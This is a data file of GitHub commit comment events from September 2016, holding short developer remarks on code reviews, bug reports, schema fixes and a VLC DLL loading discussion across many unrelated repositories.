{"id":"4614481291","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19164029,"position":8,"line":0,"path":"band-web/src/main/resources/resourcebundles/band_en.properties","commit_id":"ac9a65ea277a08288e6b9d8b233a4fc21150d929","created_at":"2016-09-25T16:06:35Z","updated_at":"2016-09-25T16:06:35Z","body":"Don't include the ':'."}},"created_at":"2016-09-25T16:06:35Z"}
{"id":"4614485324","type":"CommitCommentEvent","actor":{"login":"rdhanks"},"repo":{"name":"rdhanks/Hello-World"},"payload":{"comment":{"id":19164034,"position":null,"line":null,"path":null,"commit_id":"367d153758753fc6cd564b3296e2350300131287","created_at":"2016-09-25T16:09:12Z","updated_at":"2016-09-25T16:09:12Z","body":"This is my first comment on this commit"}},"created_at":"2016-09-25T16:09:12Z"}
{"id":"4614485767","type":"CommitCommentEvent","actor":{"login":"ajvilla"},"repo":{"name":"patel8/IBidderCapstone"},"payload":{"comment":{"id":19164035,"position":4,"line":5,"path":"app/src/main/java/edu/uwm/ibidder/LoginActivity.java","commit_id":"83555a81c22a3e84862748beb435162cee32f6b5","created_at":"2016-09-25T16:09:30Z","updated_at":"2016-09-25T16:09:30Z","body":"//test"}},"created_at":"2016-09-25T16:09:30Z"}
{"id":"4614487143","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19164036,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T16:10:26Z","updated_at":"2016-09-25T16:10:26Z","body":"Since it is size \"or\" importance you could that the canSolve method is more lines than the main void method"}},"created_at":"2016-09-25T16:10:26Z"}
{"id":"4614488657","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19164041,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T16:11:23Z","updated_at":"2016-09-25T16:11:23Z","body":"But we could say that they are equally important because if either one didn't exist then the program won't work.\r\n"}},"created_at":"2016-09-25T16:11:23Z"}
{"id":"4614489056","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19164042,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T16:11:40Z","updated_at":"2016-09-25T16:11:40Z","body":"Therefore canSolve is more main than the main method."}},"created_at":"2016-09-25T16:11:40Z"}
{"id":"4614490945","type":"CommitCommentEvent","actor":{"login":"damianciancio"},"repo":{"name":"damianciancio/LuchaGH"},"payload":{"comment":{"id":19164045,"position":null,"line":null,"path":null,"commit_id":"73d1c405f8e29fa19e546f6f83194946004f33e7","created_at":"2016-09-25T16:12:53Z","updated_at":"2016-09-25T16:12:53Z","body":"Viva el proletariado."}},"created_at":"2016-09-25T16:12:53Z"}
{"id":"4614492917","type":"CommitCommentEvent","actor":{"login":"vizv"},"repo":{"name":"hardware/rainloop"},"payload":{"comment":{"id":19164048,"position":33,"line":23,"path":"README.md","commit_id":"5a918dddf9356fb239004590337e5745677cc406","created_at":"2016-09-25T16:14:07Z","updated_at":"2016-09-25T16:14:07Z","body":"I got 502 and then I realized the port was changed :sweat: "}},"created_at":"2016-09-25T16:14:07Z"}
{"id":"4614492925","type":"CommitCommentEvent","actor":{"login":"Sarertnoc12"},"repo":{"name":"Sarertnoc12/GcData"},"payload":{"comment":{"id":19164049,"position":null,"line":null,"path":null,"commit_id":"ea85a36d84d5c5132f8d54848bba142411fabf3f","created_at":"2016-09-25T16:14:07Z","updated_at":"2016-09-25T16:14:07Z","body":"hola"}},"created_at":"2016-09-25T16:14:07Z"}
{"id":"4614493550","type":"CommitCommentEvent","actor":{"login":"KangaBounce"},"repo":{"name":"PopUpPlayground/room-service"},"payload":{"comment":{"id":19164050,"position":null,"line":null,"path":null,"commit_id":"74b3ce504dd16eb82faa43ba9566a6e52e14d22d","created_at":"2016-09-25T16:14:30Z","updated_at":"2016-09-25T16:14:30Z","body":"!! :D "}},"created_at":"2016-09-25T16:14:30Z"}
{"id":"4614493918","type":"CommitCommentEvent","actor":{"login":"Guozhongzhi"},"repo":{"name":"Guozhongzhi/computational_physics_N2014301020087"},"payload":{"comment":{"id":19164051,"position":1,"line":1,"path":"Materials","commit_id":"a6dad015097789c1a261c3f10f5074f5a6611798","created_at":"2016-09-25T16:14:42Z","updated_at":"2016-09-25T16:14:42Z","body":"![bdp j8wg1_r_ 7 weg 2 n](https://cloud.githubusercontent.com/assets/22026568/18816492/c9241a96-837d-11e6-9cc3-e8ce4ddf479b.png)\r\n![c dy g qxt8 ym 3 w6 pb](https://cloud.githubusercontent.com/assets/22026568/18816491/c9224360-837d-11e6-94d1-04ea5f0f44bf.png)\r\n"}},"created_at":"2016-09-25T16:14:42Z"}
{"id":"4614495342","type":"CommitCommentEvent","actor":{"login":"davisagli"},"repo":{"name":"plone/training"},"payload":{"comment":{"id":19164053,"position":null,"line":null,"path":null,"commit_id":"929eb9f07449115f044ee900694267cfe296f7e1","created_at":"2016-09-25T16:15:34Z","updated_at":"2016-09-25T16:15:34Z","body":"Google Custom Search is not the same as GSA. I'll add some notes on it later."}},"created_at":"2016-09-25T16:15:34Z"}
{"id":"4614496635","type":"CommitCommentEvent","actor":{"login":"mizchi"},"repo":{"name":"seizans/holy"},"payload":{"comment":{"id":19164054,"position":12,"line":7,"path":"ui/signin.js","commit_id":"cf72d3be324c632b2e9c23a00f94671c43fd550b","created_at":"2016-09-25T16:16:23Z","updated_at":"2016-09-25T16:16:23Z","body":"ここは this.refs.userId で大丈夫です。DOMに対するrefはDOMへの参照になり、Componentに対するrefはそのクラスのインスタンスになります。Componentインスタンスの参照ではなく、Componentのルート要素へのDOM参照が欲しい場合にこのコードは必要ですね\r\n"}},"created_at":"2016-09-25T16:16:23Z"}
{"id":"4614496753","type":"CommitCommentEvent","actor":{"login":"jbkempf"},"repo":{"name":"videolan/vlc"},"payload":{"comment":{"id":19164055,"position":null,"line":null,"path":null,"commit_id":"c220ddc927d1a97f72a0c5bf86de56301e3483ad","created_at":"2016-09-25T16:16:29Z","updated_at":"2016-09-25T16:16:29Z","body":"> Ok, in that case, I think what you want to do is load the plug-ins with LoadLibraryEx(pluginFileName, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32). This will force System32 as the only search directory for the plug-in DLL and all of its dependencies.\r\n\r\nAs you can see, this is already what we are doing.\r\n\r\n> Do the same for core and other desired libraries. I believe that you don't need SetDefaultDllDirectories at all.\r\n\r\nWell, this is wrong: we need that plugins and library load their library, but the code is possibly inside 3rd party libraries that we compile with VLC. So that would not solve the issue. Or we need to patch all of them.\r\n\r\n> So, it looks like it's actually possible to reset the flags with SetDefaultDllDirectories, and it gives the desired result if I call it after libvlc's initialization. I don't know why it works though - it seems to me that it shouldn't, because dependency DLLs can the reset the security restrictions for the entire application.\r\n\r\nThat seems an unexpected cool side effect, no?"}},"created_at":"2016-09-25T16:16:29Z"}
{"id":"4614497470","type":"CommitCommentEvent","actor":{"login":"SakkariNaresh"},"repo":{"name":"fcc-hyd/projects"},"payload":{"comment":{"id":19164057,"position":null,"line":null,"path":null,"commit_id":"fbb0b044730c2118cff5f6d1ef742537adf2769a","created_at":"2016-09-25T16:16:56Z","updated_at":"2016-09-25T16:16:56Z","body":"Could you please provide the steps to run the project."}},"created_at":"2016-09-25T16:16:56Z"}
{"id":"4614497560","type":"CommitCommentEvent","actor":{"login":"Sarertnoc12"},"repo":{"name":"Sarertnoc12/GcData"},"payload":{"comment":{"id":19164058,"position":null,"line":null,"path":null,"commit_id":"ea85a36d84d5c5132f8d54848bba142411fabf3f","created_at":"2016-09-25T16:16:59Z","updated_at":"2016-09-25T16:16:59Z","body":"hola"}},"created_at":"2016-09-25T16:16:59Z"}
{"id":"4614501307","type":"CommitCommentEvent","actor":{"login":"evolation"},"repo":{"name":"evolation/hello-world"},"payload":{"comment":{"id":19164064,"position":6,"line":6,"path":"README.md","commit_id":"dc5d5084e6816601d1ed970f9892fbaf430675da","created_at":"2016-09-25T16:19:24Z","updated_at":"2016-09-25T16:19:24Z","body":"why"}},"created_at":"2016-09-25T16:19:24Z"}
{"id":"4614502587","type":"CommitCommentEvent","actor":{"login":"evolation"},"repo":{"name":"evolation/hello-world"},"payload":{"comment":{"id":19164066,"position":6,"line":6,"path":"README.md","commit_id":"dc5d5084e6816601d1ed970f9892fbaf430675da","created_at":"2016-09-25T16:20:14Z","updated_at":"2016-09-25T16:20:14Z","body":"yaaaaa\r\n"}},"created_at":"2016-09-25T16:20:14Z"}
{"id":"4614503716","type":"CommitCommentEvent","actor":{"login":"hardware"},"repo":{"name":"hardware/rainloop"},"payload":{"comment":{"id":19164068,"position":33,"line":23,"path":"README.md","commit_id":"5a918dddf9356fb239004590337e5745677cc406","created_at":"2016-09-25T16:20:58Z","updated_at":"2016-09-25T16:20:58Z","body":"Hehe, I mentioned the new port here : https://github.com/hardware/mailserver :)"}},"created_at":"2016-09-25T16:20:58Z"}
{"id":"4614504145","type":"CommitCommentEvent","actor":{"login":"evolation"},"repo":{"name":"evolation/hello-world"},"payload":{"comment":{"id":19164070,"position":8,"line":2,"path":"README.md","commit_id":"dc5d5084e6816601d1ed970f9892fbaf430675da","created_at":"2016-09-25T16:21:15Z","updated_at":"2016-09-25T16:21:15Z","body":"good\r\n"}},"created_at":"2016-09-25T16:21:15Z"}
{"id":"4614504379","type":"CommitCommentEvent","actor":{"login":"evolation"},"repo":{"name":"evolation/hello-world"},"payload":{"comment":{"id":19164072,"position":1,"line":1,"path":"README.md","commit_id":"dc5d5084e6816601d1ed970f9892fbaf430675da","created_at":"2016-09-25T16:21:25Z","updated_at":"2016-09-25T16:21:25Z","body":"none"}},"created_at":"2016-09-25T16:21:25Z"}
{"id":"4614504489","type":"CommitCommentEvent","actor":{"login":"OceanInternet"},"repo":{"name":"benb0jangles/FlySky-i6-Mod-"},"payload":{"comment":{"id":19164073,"position":null,"line":null,"path":null,"commit_id":"fa57aa575f88fb7fbd87ff9dec6bd3fce928eaf2","created_at":"2016-09-25T16:21:28Z","updated_at":"2016-09-25T16:21:28Z","body":"I managed to flash under wine by creating a symlink between COM1 and /dev/ttyUSB0 - couldn't find this documented anywhere"}},"created_at":"2016-09-25T16:21:28Z"}
{"id":"4614504494","type":"CommitCommentEvent","actor":{"login":"JeffSpies"},"repo":{"name":"CenterForOpenScience/osf.io"},"payload":{"comment":{"id":19164074,"position":null,"line":null,"path":null,"commit_id":"acbec71253a17c879872a8d9de856d2a50b0fe7c","created_at":"2016-09-25T16:21:28Z","updated_at":"2016-09-25T16:21:28Z","body":"@caseyrollins This impacts other buttons, namely the \"Create new project\" button when a user without projects first logins and sees their dashboard."}},"created_at":"2016-09-25T16:21:28Z"}
{"id":"4614506629","type":"CommitCommentEvent","actor":{"login":"rockyrmit"},"repo":{"name":"ibab/tensorflow-wavenet"},"payload":{"comment":{"id":19164078,"position":null,"line":null,"path":null,"commit_id":"243c9b8f382502c0dfcac5100c387a7a44491d1d","created_at":"2016-09-25T16:22:57Z","updated_at":"2016-09-25T16:22:57Z","body":"thanks @mortont, i tried to record an audio clip through audacity as a seed audio, but looks like the generated result still doesn't sound any realistic sentence.\r\n\r\ndo you think there is a way to give a seed clip, it will be able to generate a clip that sounds like the original seed clip, but with trained speaker voice model/feature?\r\n\r\nbtw, what's your email, we can discuss over email. mine: xinjie.yu@gmail.com "}},"created_at":"2016-09-25T16:22:57Z"}
{"id":"4614506929","type":"CommitCommentEvent","actor":{"login":"vizv"},"repo":{"name":"hardware/rainloop"},"payload":{"comment":{"id":19164079,"position":33,"line":23,"path":"README.md","commit_id":"5a918dddf9356fb239004590337e5745677cc406","created_at":"2016-09-25T16:23:08Z","updated_at":"2016-09-25T16:23:08Z","body":"I see, thanks. I just did a `docker-compose pull`. :smile: "}},"created_at":"2016-09-25T16:23:08Z"}
{"id":"4614507161","type":"CommitCommentEvent","actor":{"login":"catdad"},"repo":{"name":"catdad/grandma"},"payload":{"comment":{"id":19164080,"position":null,"line":null,"path":null,"commit_id":"3de34804a07fd861592fad536ea3dd6e5c90f306","created_at":"2016-09-25T16:23:17Z","updated_at":"2016-09-25T16:23:17Z","body":"#86 "}},"created_at":"2016-09-25T16:23:17Z"}
{"id":"4614508021","type":"CommitCommentEvent","actor":{"login":"vramana"},"repo":{"name":"fcc-hyd/projects"},"payload":{"comment":{"id":19164093,"position":null,"line":null,"path":null,"commit_id":"fbb0b044730c2118cff5f6d1ef742537adf2769a","created_at":"2016-09-25T16:23:50Z","updated_at":"2016-09-25T16:23:50Z","body":"Today's project?"}},"created_at":"2016-09-25T16:23:50Z"}
{"id":"4614508649","type":"CommitCommentEvent","actor":{"login":"earthgecko"},"repo":{"name":"odysseus654/pydsn"},"payload":{"comment":{"id":19164095,"position":90,"line":90,"path":"schema.sql","commit_id":"83f9e9f41cb9995012ea0f050addfef1a013c2f6","created_at":"2016-09-25T16:24:12Z","updated_at":"2016-09-25T16:24:12Z","body":"Hi Heather\r\n\r\nJust a quick note.  dataSignal.id needs to be mediumint, after about 24 days of running at 10 second intervals, the dataSignal table got to 65535 rows.\r\n\r\nI did in-situ ALTERs on mine, but I need to declared the AUTO_INCREMENT in the ALTER otherwise the column lost it AUTO_INCREMENT and somehow got default '0', which caused Duplicate errors.  If a schema was built with mediumint, obviously this process is null and void.\r\n\r\nThe setting of the AUTO_INCREMENT is only added as my first ALTER TABLE only\r\nchanged the int to mediumint and the field seemed to lose it's AUTO_INCREMENT,\r\nwhich lead to Duplicate key errors as 0 was used as the default, as found in a\r\ndump.\r\n\r\n```\r\nCREATE TABLE `dataSignal` (\r\n\t`ID` MEDIUMINT(9) NOT NULL DEFAULT '0',\r\n\t`eventID` MEDIUMINT(8) UNSIGNED NOT NULL,\r\n...\r\n...\r\n```\r\n\r\nSo this method ensures that the tables are modified correctly and the current AUTO_INCREMENT set in an existing table.\r\n\r\n```\r\n# Stop dbsync\r\n# Determine your last dataSignal.ID <YOUR_LAST_ID> to set the AUTO_INCREMENT\r\n\r\nALTER TABLE `dataSignal` MODIFY COLUMN `ID` mediumint unsigned NOT NULL AUTO_INCREMENT;\r\nALTER TABLE `dataSignal` AUTO_INCREMENT = <YOUR_LAST_ID>;\r\n\r\nALTER TABLE `dataSignalDet` MODIFY COLUMN `dataSignalID` mediumint;\r\nALTER TABLE `dataSignalLastDet` MODIFY COLUMN `dataSignalID` mediumint;\r\n\r\n# Start dbsync\r\n```\r\n\r\nHope this helps if you go forward with your other idea."}},"created_at":"2016-09-25T16:24:12Z"}
{"id":"4614510714","type":"CommitCommentEvent","actor":{"login":"kskarthik"},"repo":{"name":"mozilla-b2g/gaia"},"payload":{"comment":{"id":19164098,"position":null,"line":null,"path":null,"commit_id":"975a35c0f5010df341e96d6c5ec60217f5347412","created_at":"2016-09-25T16:25:32Z","updated_at":"2016-09-25T16:25:32Z","body":"What happened @adfad666"}},"created_at":"2016-09-25T16:25:32Z"}
{"id":"4614510808","type":"CommitCommentEvent","actor":{"login":"noctuid"},"repo":{"name":"noctuid/general.el"},"payload":{"comment":{"id":19164099,"position":null,"line":null,"path":null,"commit_id":"86a0c0e3c41036c7f525f89ad65590c7a97aaa61","created_at":"2016-09-25T16:25:37Z","updated_at":"2016-09-25T16:25:37Z","body":"Thanks! Let me know if you ever have any suggestions for improvement."}},"created_at":"2016-09-25T16:25:37Z"}
{"id":"4614513316","type":"CommitCommentEvent","actor":{"login":"Ravindra-a"},"repo":{"name":"Ravindra-a/ravindra-a.github.io"},"payload":{"comment":{"id":19164102,"position":null,"line":null,"path":null,"commit_id":"143851cd9b68054afd1a61c459a828a6ff1e0a65","created_at":"2016-09-25T16:27:15Z","updated_at":"2016-09-25T16:27:15Z","body":"Delted unwanted files"}},"created_at":"2016-09-25T16:27:15Z"}
{"id":"4614515112","type":"CommitCommentEvent","actor":{"login":"tr222cj"},"repo":{"name":"sticky4loop/1DV607-workshop-2"},"payload":{"comment":{"id":19164103,"position":null,"line":null,"path":null,"commit_id":"5b0989aa5800e0298dcf1ce869d9e50c34ae4cd6","created_at":"2016-09-25T16:28:26Z","updated_at":"2016-09-25T16:28:26Z","body":"It's not working yet so no merging of this branch mister!"}},"created_at":"2016-09-25T16:28:26Z"}
{"id":"4614517456","type":"CommitCommentEvent","actor":{"login":"mercul3s"},"repo":{"name":"mercul3s/mercedescoyle.com-jekyll"},"payload":{"comment":{"id":19164108,"position":37,"line":37,"path":"blog/_posts/2016-09-18-testing-elixir-http-client-with-exvcr-and-httpoison.md","commit_id":"a4cd071765c4c2aa818b28e6981811216635814a","created_at":"2016-09-25T16:30:00Z","updated_at":"2016-09-25T16:30:00Z","body":"Thanks for catching that!"}},"created_at":"2016-09-25T16:30:00Z"}
{"id":"4614521563","type":"CommitCommentEvent","actor":{"login":"GreatJaggi"},"repo":{"name":"GreatJaggi/vikingraidsrc"},"payload":{"comment":{"id":19164119,"position":null,"line":null,"path":null,"commit_id":"f155c4cbbf86f8b34544a45f5dc13576da104784","created_at":"2016-09-25T16:32:33Z","updated_at":"2016-09-25T16:32:33Z","body":"**Vikings Raid Asset Repository**\r\n_Created on 09-26-2016_\r\n\r\n_<strong>Jugs</strong>_\r\n_© TG Nation 2016_"}},"created_at":"2016-09-25T16:32:33Z"}
{"id":"4614523306","type":"CommitCommentEvent","actor":{"login":"Aayushya"},"repo":{"name":"F-AOSP/manifest"},"payload":{"comment":{"id":19164122,"position":9,"line":10,"path":"moto-msm8916.xml","commit_id":"ec702e0428c7a2d097e011ce7cb20682f29e835c","created_at":"2016-09-25T16:33:41Z","updated_at":"2016-09-25T16:33:41Z","body":"Whoops, duplicate repo. :)"}},"created_at":"2016-09-25T16:33:41Z"}
{"id":"4614524870","type":"CommitCommentEvent","actor":{"login":"JBCDroid2"},"repo":{"name":"CypherOS/platform_manifest"},"payload":{"comment":{"id":19164127,"position":null,"line":null,"path":null,"commit_id":"2c9f22b0440a6e168eb445c4825ca7b0d40c6379","created_at":"2016-09-25T16:34:44Z","updated_at":"2016-09-25T16:34:44Z","body":"line 41 <project path=\"external/selinux\" name=\"external_selinux\" remote=\"cypher\" />\r\nthis repository does not exist"}},"created_at":"2016-09-25T16:34:44Z"}
{"id":"4614527511","type":"CommitCommentEvent","actor":{"login":"bbonneton"},"repo":{"name":"swagger-api/swagger-node"},"payload":{"comment":{"id":19164130,"position":null,"line":null,"path":null,"commit_id":"103b833894965655765e157edd5ae3ca819f5ee9","created_at":"2016-09-25T16:36:28Z","updated_at":"2016-09-25T16:36:28Z","body":"Hello,\r\n\r\nWith this commit, I get the following error on swagger project edit :\r\n```\r\nmodule.js:442\r\n    throw err;\r\n    ^\r\n\r\nError: Cannot find module 'swagger-editor'\r\n    at Function.Module._resolveFilename (module.js:440:15)\r\n    at Function.resolve (internal/module.js:27:19)\r\n    at Object.<anonymous> (C:\\Users\\Blabla\\AppData\\Roaming\\npm\\node_modules\\swagger\\config\\index.js:36:35)\r\n    at Module._compile (module.js:541:32)\r\n    at Object.Module._extensions..js (module.js:550:10)\r\n    at Module.load (module.js:458:32)\r\n    at tryModuleLoad (module.js:417:12)\r\n    at Function.Module._load (module.js:409:3)\r\n    at Module.require (module.js:468:17)\r\n    at require (internal/module.js:20:19)\r\n```\r\nOS: Windows 7 Pro 64bits\r\nNode: 6.3.1\r\nNPM: 3.10.8\r\n\r\nIf I revert the commit, I stop getting the error. So, what is the purpose of this commit ?\r\n\r\nBest regards,\r\nBruno"}},"created_at":"2016-09-25T16:36:28Z"}
{"id":"4614528075","type":"CommitCommentEvent","actor":{"login":"jakubhava"},"repo":{"name":"h2oai/sparkling-water"},"payload":{"comment":{"id":19164132,"position":null,"line":null,"path":null,"commit_id":"cd3673c5b15a9e9f487d56044c30437acb9f5f51","created_at":"2016-09-25T16:36:51Z","updated_at":"2016-09-25T16:36:51Z","body":"Sorry that the change is so big, I realised that some time ago and won't do it like this next time.\r\n\r\nIt should not be hard to integrate or I also think that there should not be big problems with integrating it with @vpatryshev changes. This was also why I was trying to keep some API you were working on the same as was in master. I have looked on your PR with type handling and it should easy to integrate, I will just generalise ReadConvertorContext a bit as I wrote at one of the comments in that PR. So we can integrate your PR first and then I can integrate this branch on top of that \r\n\r\nRegarding tests. I haven't created tests for this functionality because I changed the current tests to be able to tests both external and internal backends and thought it's enough. But I definitely welcome suggestions what I should improve and generally improving QA as @mmalohlava said this one is a good thing!\r\n"}},"created_at":"2016-09-25T16:36:51Z"}
{"id":"4614529148","type":"CommitCommentEvent","actor":{"login":"Liryna"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19164134,"position":null,"line":null,"path":null,"commit_id":"7960517074f7a7e84ebbb95bf128c4ae519102ee","created_at":"2016-09-25T16:37:32Z","updated_at":"2016-09-25T16:37:32Z","body":"Ah ! Didn't tought about it! Hope this gonna be fixed soon 😢 "}},"created_at":"2016-09-25T16:37:32Z"}
{"id":"4614532013","type":"CommitCommentEvent","actor":{"login":"DckToken"},"repo":{"name":"DckToken/ero-bot"},"payload":{"comment":{"id":19164137,"position":33,"line":231,"path":"run.py","commit_id":"93ece5b3395aa324b6572904327a9e73a2a45fdc","created_at":"2016-09-25T16:39:23Z","updated_at":"2016-09-25T16:39:23Z","body":"Moved this to line 226, so I can use it after`if error == False:`"}},"created_at":"2016-09-25T16:39:23Z"}
{"id":"4614533370","type":"CommitCommentEvent","actor":{"login":"jyrkive"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19164139,"position":null,"line":null,"path":null,"commit_id":"16c1b86443214340faf6f45702bac164b8cdaa34","created_at":"2016-09-25T16:40:14Z","updated_at":"2016-09-25T16:40:14Z","body":"Ah, I see.\r\n\r\nNo, reading the metadata dynamically isn't possible at present. The game uses libvorbis through SDL_mixer, not directly. The metadata reading functions in libvorbis aren't accessible."}},"created_at":"2016-09-25T16:40:14Z"}
{"id":"4614533721","type":"CommitCommentEvent","actor":{"login":"bwahl"},"repo":{"name":"PanthR/panthrBase"},"payload":{"comment":{"id":19164141,"position":16,"line":187,"path":"test/variable/getSet.spec.js","commit_id":"99226bbed68c831670f58d0ceb6e70e03f2584f2","created_at":"2016-09-25T16:40:26Z","updated_at":"2016-09-25T16:40:26Z","body":"Please use single quotes."}},"created_at":"2016-09-25T16:40:26Z"}
{"id":"4614533865","type":"CommitCommentEvent","actor":{"login":"Rondom"},"repo":{"name":"dokan-dev/dokany"},"payload":{"comment":{"id":19164142,"position":null,"line":null,"path":null,"commit_id":"7960517074f7a7e84ebbb95bf128c4ae519102ee","created_at":"2016-09-25T16:40:31Z","updated_at":"2016-09-25T16:40:31Z","body":"Well, I doubt it will fix itself, I will file an issue later. Maybe sometime who sees the issue has time to RDP into Appveyor to troubleshoot.\r\n\r\nWe might also try to remove the cmd /c start /w and see if we get some console output in the Appveyor log."}},"created_at":"2016-09-25T16:40:31Z"}
{"id":"4614535984","type":"CommitCommentEvent","actor":{"login":"zang1123"},"repo":{"name":"zang1123/hello-world"},"payload":{"comment":{"id":19164145,"position":null,"line":null,"path":null,"commit_id":"f2d7318f80faacd3b76511775c36540d4d95b779","created_at":"2016-09-25T16:41:54Z","updated_at":"2016-09-25T16:41:54Z","body":"Updated on Sep 25."}},"created_at":"2016-09-25T16:41:54Z"}
{"id":"4614540122","type":"CommitCommentEvent","actor":{"login":"MakerTim"},"repo":{"name":"MakerTim/LuckPermsUI"},"payload":{"comment":{"id":19164147,"position":null,"line":null,"path":null,"commit_id":"b2bc22cf1378f9f67d71af5a05c2b93b5350ba48","created_at":"2016-09-25T16:44:49Z","updated_at":"2016-09-25T16:44:49Z","body":"I normally make only Plugins / programs dat doesnt need main stuff... so didn't knew that the plugin would handle it for you\r\n\r\nty anyways 😄 . Smarter every day"}},"created_at":"2016-09-25T16:44:49Z"}
{"id":"4614541062","type":"CommitCommentEvent","actor":{"login":"HearToWear"},"repo":{"name":"HearToWear/BlackCon"},"payload":{"comment":{"id":19164148,"position":null,"line":null,"path":null,"commit_id":"7ff2062b3556ef3af72e7817617ae8c29793db01","created_at":"2016-09-25T16:45:22Z","updated_at":"2016-09-25T16:45:22Z","body":"Affixed the navbar"}},"created_at":"2016-09-25T16:45:22Z"}
{"id":"4614543873","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19164150,"position":null,"line":null,"path":null,"commit_id":"417599f83cb6c343bd2ec69cd4b2e9f522123c6e","created_at":"2016-09-25T16:47:25Z","updated_at":"2016-09-25T16:47:25Z","body":"Ok, i think i've fixed almost everything... Bt now works (even if i don't like so much this: https://github.com/AOSP-JF-MM/platform_system_bt/commit/50ff6814bcf7e9e06fecfad6c46b29b8a415cc68), telephony-ext crap is no more needed (and compiled), and everything else i've tried seems working fine... Needs some testing, i'm uploading the ROM on dp, please remember that move from ALPHA to ALPHA-CAF should work without any issue, but go back from ALPHA-CAF to ALPHA will cause a lot of crashes due to updated databases that Android is not able to downgrade, so make a Backup before flash."}},"created_at":"2016-09-25T16:47:25Z"}
{"id":"4614544210","type":"CommitCommentEvent","actor":{"login":"cdriza"},"repo":{"name":"RyanJGray/Backdoor_Busting_2015"},"payload":{"comment":{"id":19164151,"position":null,"line":null,"path":null,"commit_id":"ac0fb08485a7451f648bb419077d91721553b5d2","created_at":"2016-09-25T16:47:38Z","updated_at":"2016-09-25T16:47:38Z","body":"> The uploader on MPGH, \"Liquid.Crew\", is actually \"cdriza\"\r\nno but n1"}},"created_at":"2016-09-25T16:47:38Z"}
{"id":"4614545261","type":"CommitCommentEvent","actor":{"login":"ArchDemons"},"repo":{"name":"tonihele/OpenKeeper"},"payload":{"comment":{"id":19164153,"position":92,"line":92,"path":"src/toniarts/openkeeper/world/room/control/RoomAudioControl.java","commit_id":"e91fa3cfac885d16b532ccb8ce8ee68f94aa1f19","created_at":"2016-09-25T16:48:21Z","updated_at":"2016-09-25T16:48:21Z","body":"really directional and positional? :)"}},"created_at":"2016-09-25T16:48:21Z"}
{"id":"4614545622","type":"CommitCommentEvent","actor":{"login":"BenTristem"},"repo":{"name":"UnrealCourse/02_BullCowGame"},"payload":{"comment":{"id":19164154,"position":null,"line":null,"path":null,"commit_id":"0bf9c9bbcba2f7a60c83d92bda710f26931f6502","created_at":"2016-09-25T16:48:35Z","updated_at":"2016-09-25T16:48:35Z","body":"Thanks for pointing this out, this is fixed in a later lecture.\n\nBen Tristem\n\nhttps://www.udemy.com/u/bentristem\nTwitter: @BenTristem\nSkype: BulldogBen\n\nOn 23 September 2016 at 02:45, Patrick Mattei <notifications@github.com>\nwrote:\n\n> I just copied the entire code into XCode and I'm getting the error:\n> \"Control may reach end of non-void function\"\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/UnrealCourse/02_BullCowGame/commit/0bf9c9bbcba2f7a60c83d92bda710f26931f6502#commitcomment-19139816>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AERoqAz3sYgwiokI4yk6CyqkKauuXnbDks5qsy86gaJpZM4Ip1PO>\n> .\n>\n"}},"created_at":"2016-09-25T16:48:35Z"}
{"id":"4614546045","type":"CommitCommentEvent","actor":{"login":"atamariya"},"repo":{"name":"atamariya/UniversalMediaServer"},"payload":{"comment":{"id":19164155,"position":5,"line":112,"path":"src/main/java/net/pms/dlna/DLNAResource.java","commit_id":"3b43af866b15df8de2a8ee91da3308dabed36b8d","created_at":"2016-09-25T16:48:52Z","updated_at":"2016-09-25T16:48:52Z","body":"When Ehcache is used, serialization happens."}},"created_at":"2016-09-25T16:48:52Z"}
{"id":"4614546061","type":"CommitCommentEvent","actor":{"login":"Airblader"},"repo":{"name":"Airblader/i3"},"payload":{"comment":{"id":19164156,"position":null,"line":null,"path":null,"commit_id":"9b336108b23e9ac6aa758846884b8a15767fcfa3","created_at":"2016-09-25T16:48:53Z","updated_at":"2016-09-25T16:48:53Z","body":"@drizbit That's described in the README."}},"created_at":"2016-09-25T16:48:53Z"}
{"id":"4614548110","type":"CommitCommentEvent","actor":{"login":"hostaboat"},"repo":{"name":"haydnw/AirPi"},"payload":{"comment":{"id":19164157,"position":null,"line":null,"path":null,"commit_id":"e52289bb06f745f8d46587c66980ad66fe9b926d","created_at":"2016-09-25T16:50:24Z","updated_at":"2016-09-25T16:50:24Z","body":"This part of the commit in `format_output_gps()` broke GPS logging:\r\n`\r\n100          -        return str(prop.ljust(17) + \": \" + str(\"{0:.2f}\".format(value)).rjust(10) + \" \" + unit) \r\n        147  +        value = str(prop.ljust(17)) + \": \"\r\n         148 +        value += str(\"{0:.2f}\".format(value).rjust(10) + \" \" + unit) \r\n`\r\nNote that `value` is passed in as an argument then immediately assigned a value that is a string.  When it is then appended to, the attempt to format a now string as a float causes an exception."}},"created_at":"2016-09-25T16:50:24Z"}
{"id":"4614548754","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"atamariya/UniversalMediaServer"},"payload":{"comment":{"id":19164158,"position":5,"line":112,"path":"src/main/java/net/pms/dlna/DLNAResource.java","commit_id":"3b43af866b15df8de2a8ee91da3308dabed36b8d","created_at":"2016-09-25T16:50:51Z","updated_at":"2016-09-25T16:50:51Z","body":"Ok, I'm not familiar with it but I understand."}},"created_at":"2016-09-25T16:50:51Z"}
